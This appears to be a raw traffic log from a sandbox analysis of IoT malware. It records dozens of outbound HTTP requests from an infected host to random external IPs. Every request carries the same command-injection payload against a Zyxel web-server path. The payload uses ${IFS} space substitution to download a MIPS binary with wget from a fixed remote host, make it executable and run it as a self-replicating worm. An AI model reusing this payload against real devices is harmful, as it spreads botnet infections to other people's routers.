                                      Jan 19, 2024 17:29:21.551012039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1811192.168.2.143403624.196.132.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551050901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1812192.168.2.144758678.93.53.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551080942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1813192.168.2.1437270145.155.187.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551114082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1814192.168.2.144360479.236.108.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551126957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1815192.168.2.1456342108.213.166.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551192999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1816192.168.2.144933681.255.29.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551224947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1817192.168.2.1438690119.17.166.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551256895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1818192.168.2.144968871.2.112.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551292896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1819192.168.2.1440166166.170.150.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551323891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1820192.168.2.145642647.100.239.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551347017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1821192.168.2.1433034130.166.141.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551398039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1822192.168.2.1456148151.72.197.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551424980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1823192.168.2.1435156145.48.23.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551460028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1824192.168.2.144820439.123.236.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551484108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1825192.168.2.144067287.161.236.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551507950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1826192.168.2.143841634.28.140.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551529884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1827192.168.2.143314023.244.56.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551573992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1828192.168.2.144485673.80.244.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551599026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1829192.168.2.143434637.122.201.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551639080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1830192.168.2.1458758180.45.205.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551659107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1831192.168.2.1444644103.69.141.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551695108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1832192.168.2.1444144135.187.23.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551736116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1833192.168.2.143852643.157.133.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551764965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1834192.168.2.143692650.34.255.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551810980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1835192.168.2.1439766151.111.24.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551856041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1836192.168.2.145133818.10.202.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551888943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1837192.168.2.143644673.39.196.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551930904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1838192.168.2.1440292102.154.11.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551960945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1839192.168.2.143449295.244.46.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.551978111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1840192.168.2.145880893.48.119.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552009106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1841192.168.2.1433762196.124.76.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552052021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1842192.168.2.1450102188.56.157.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552086115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1843192.168.2.143747243.96.20.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552119017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1844192.168.2.145394277.72.13.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552154064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1845192.168.2.144796473.84.99.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552180052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1846192.168.2.1451680113.145.233.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552211046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1847192.168.2.1438186160.187.185.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552253962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1848192.168.2.1446150188.30.143.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552299023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1849192.168.2.145444682.172.159.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552324057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1850192.168.2.1440204108.59.121.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552352905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1851192.168.2.143908697.105.171.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552391052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1852192.168.2.1453842159.160.87.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552417994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1853192.168.2.144780446.248.202.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552448988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1854192.168.2.143789418.202.51.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552474022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1855192.168.2.1442198209.227.35.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552505016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1856192.168.2.1452986139.175.17.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552530050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1857192.168.2.1445264184.158.62.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552541018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1858192.168.2.1442508160.73.136.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552582979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1859192.168.2.1454208183.143.12.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552633047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1860192.168.2.1453864156.192.58.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552663088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1861192.168.2.144113296.210.19.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552685976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1862192.168.2.1449014150.102.57.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552731037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1863192.168.2.1459900138.27.115.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552762032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1864192.168.2.1452228141.59.166.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.552793980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1865192.168.2.143696091.17.133.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.555130005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1866192.168.2.1459508188.134.216.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.555162907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1867192.168.2.1449586147.152.76.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.555213928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1868192.168.2.1448028162.147.53.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.555258989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1869192.168.2.1446806170.220.226.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.555954933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1870192.168.2.1437298149.131.52.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556030035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1871192.168.2.1448316164.208.6.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556061983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1872192.168.2.1447270107.152.85.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556094885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1873192.168.2.1456844107.109.114.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:21.556140900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1874192.168.2.143635291.105.41.77443
                                      TimestampBytes transferredDirectionData
